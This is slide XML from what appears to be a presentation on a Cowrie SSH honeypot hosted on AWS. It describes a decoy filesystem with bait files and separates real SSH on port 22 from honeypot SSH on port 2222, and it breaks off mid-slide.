              <a:t>Understanding the directory structure visible to an attacker is crucial for a successful honeypot. This diagram illustrates the fake filesystem within our Cowrie honeypot, designed to mimic a typical Linux environment and lure attackers towards enticing, yet harmless, data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 0" descr="preencoded.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2053352" y="2173486"/>
            <a:ext cx="10523696" cy="5145167"/>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21735" y="4912049"/>
            <a:ext cx="328554" cy="328554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302572" y="2580011"/>
            <a:ext cx="2270810" cy="292337"/>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Root</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302572" y="2955501"/>
            <a:ext cx="2270810" cy="467739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/ with standard top-level dirs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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0367" y="4912049"/>
            <a:ext cx="328554" cy="328554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10048205" y="2580011"/>
            <a:ext cx="2270810" cy="292337"/>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Home</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10048205" y="2955501"/>
            <a:ext cx="2270810" cy="467739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/home/admin containing Documents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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8999" y="4912049"/>
            <a:ext cx="328554" cy="328554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302572" y="5286728"/>
            <a:ext cx="2270810" cy="292337"/>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Documents</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302572" y="5662218"/>
            <a:ext cx="2270810" cy="467739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Contains passwords.txt and server_info.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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8026" y="4912049"/>
            <a:ext cx="328555" cy="328554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10037649" y="5286728"/>
            <a:ext cx="2270810" cy="292337"/>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Opt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10037649" y="5662218"/>
            <a:ext cx="2270810" cy="467739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1350"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>/opt/company-app with config.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="737830" y="7508319"/>
            <a:ext cx="13154739" cy="547449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>By carefully crafting this filesystem with decoy files like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>passwords.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>server_info.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="101010"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>config.json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>, we can observe attacker behavior, tool usage, and reconnaissance efforts without exposing any real systems. This provides valuable insights into their methods and objectives.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4502" y="608528"/>
            <a:ext cx="9149715" cy="449461"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3500"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Network Architecture: OSI Model &amp; Deception Layers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774502" y="1345644"/>
            <a:ext cx="13081397" cy="862965"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 25002"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789742" y="1360884"/>
            <a:ext cx="575310" cy="832485"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34325"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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716" y="1669137"/>
            <a:ext cx="215741" cy="215741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="1504712"/>
            <a:ext cx="1797963" cy="224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>OSI Model Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="1815584"/>
            <a:ext cx="12187952" cy="230029"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>7-layer network communication framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774502" y="2352437"/>
            <a:ext cx="13081397" cy="1139309"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789742" y="2367677"/>
            <a:ext cx="575310" cy="1108829"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34325"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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716" y="2814161"/>
            <a:ext cx="215741" cy="215741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="2511504"/>
            <a:ext cx="3426262" cy="224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Layer 3 (Network Layer) - IP Addressing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="2822377"/>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Real EC2 Instance: Public IP 44.218.220.47 (Elastic IP), Private IP 10.0.1.x (VPC internal)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="3102650"/>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Cowrie Honeypot Shell: Emulated IP (fake system claims), Display IP (fake internal like 192.168.1.100)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774502" y="3635573"/>
            <a:ext cx="13081397" cy="1139309"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789742" y="3650813"/>
            <a:ext cx="575310" cy="1108829"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34325"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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716" y="4097298"/>
            <a:ext cx="215741" cy="215741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="3794641"/>
            <a:ext cx="3720941" cy="224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="DM Sans Semi Bold" pitchFamily="34" charset="0"/>
                <a:ea typeface="DM Sans Semi Bold" pitchFamily="34" charset="-122"/>
                <a:cs typeface="DM Sans Semi Bold" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Layer 4 (Transport Layer) - Port Separation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="4105513"/>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Administrative Access (Real): Port 22/TCP SSH to actual Amazon Linux 2 OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="4385786"/>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Honeypot Access (Fake): Port 2222/TCP SSH to Cowrie Python emulation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774502" y="4918710"/>
            <a:ext cx="13081397" cy="1139309"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 18938"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="030303"/>
          </a:solidFill>
          <a:ln w="15240">
            <a:solidFill>
              <a:srgbClr val="3B3B3B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="789742" y="4933950"/>
            <a:ext cx="575310" cy="1108829"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 34325"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="222222"/>
          </a:solidFill>
          <a:ln/>
          <a:effectLst>
            <a:outerShdw dist="12700" dir="2700000" algn="bl" rotWithShape="0">
              <a:srgbClr val="3B3B3B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>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716" y="5380434"/>
            <a:ext cx="215741" cy="215741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1508879" y="5077778"/>
            <a:ext cx="4448413" cy="224671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="1750"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
